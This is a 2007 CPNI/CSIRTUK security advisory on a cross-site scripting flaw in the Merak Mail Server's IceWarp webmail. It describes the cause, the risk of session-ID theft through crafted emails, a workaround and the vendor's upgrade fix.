ID: 3388
Date: 18 September 2007 09:41
Title: 3388 - Merak Mail Server Vulnerability
Abstract: Decription of a vulnerability in the Merak Mail Server recently reported by MWR InfoSecurity.
Vendors affected:Merak
Availability of fix: Available
Type of fix: Patch
Source: MWR InfoSecurity
Reliability of source: Trusted
Source URL: http://www.mwrinfosecurity.com/publications/mwri_merak-webmail-xss-advisory_2008-09-17.pdf
CVE Reference: Not yet submitted
Date: 2007-08-29
Severity:High Risk
Local/Remote: Remote
Vulnerability Class: XSS Affected
Versions: Confirmed in versions 8.9.2 and 8.9.1
Vendor http://reddot-1.cpni.local/CMS/ioEditor/http//www.merakemailserver.co.uk
Vendor Response: Version 9 of the Merak Mail Server has since been released.
OWASP Designation: Cross Site Scripting (XSS)
Web Application Language: PHP, HTML, JavaScript
Impact: The vulnerability allows malicious scripts to be executed within the context of the user’s browser window.
Overview: The Merak Mail Server provides a web based interface called IceWarp which allows users to send and retrieve emails using a web browser. However, email content is not sufficiently sanitised which can result in the execution of arbitrary scripts.
On accessing the web interface of the application the user is assigned two session IDs. An attacker could harvest these sessions IDs by sending specially crafted emails to users. The session IDs would be transmitted to the attacker when the users opened the malicious emails. With this information the attacker would be able to gain access to the users accounts. In fact, an attacker would have the ability to embed any JavaScript within an email and so a wide variety of XSS attacks could be performed.
This vulnerability has been confirmed in versions 8.9.1 (Windows) and 8.9.2 (Linux).
It is expected, although not confirmed, that other, earlier versions are also vulnerable.
Cause:The vulnerability is the result of insufficient sanitisation of email content. Interim Workaround:Restricting webmail access to trusted IP addresses only will help to mitigate the effect of some XSS attacks.
Solution:The vendor has recommended that users upgrade to Merak Email Server 9.
This advisory contains information released by the original author. Some of the information may have changed since it was released. If the issue affects you, it may be prudent to retrieve the advisory from the site of the original source to ensure that you receive the most current information concerning that problem. Reference to any specific commercial product, process, or service by trade name, trademark manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by CPNI.
The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes. CPNI shall not accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this advisory.
CSIRTUK is a member of the Forum of Incident Response and Security Teams (FIRST) and has contacts with other international Incident Response Teams (IRTs) in order to foster cooperation and coordination in incident prevention, to prompt rapid reaction to incidents, and to promote information sharing amongst its members and the community at large.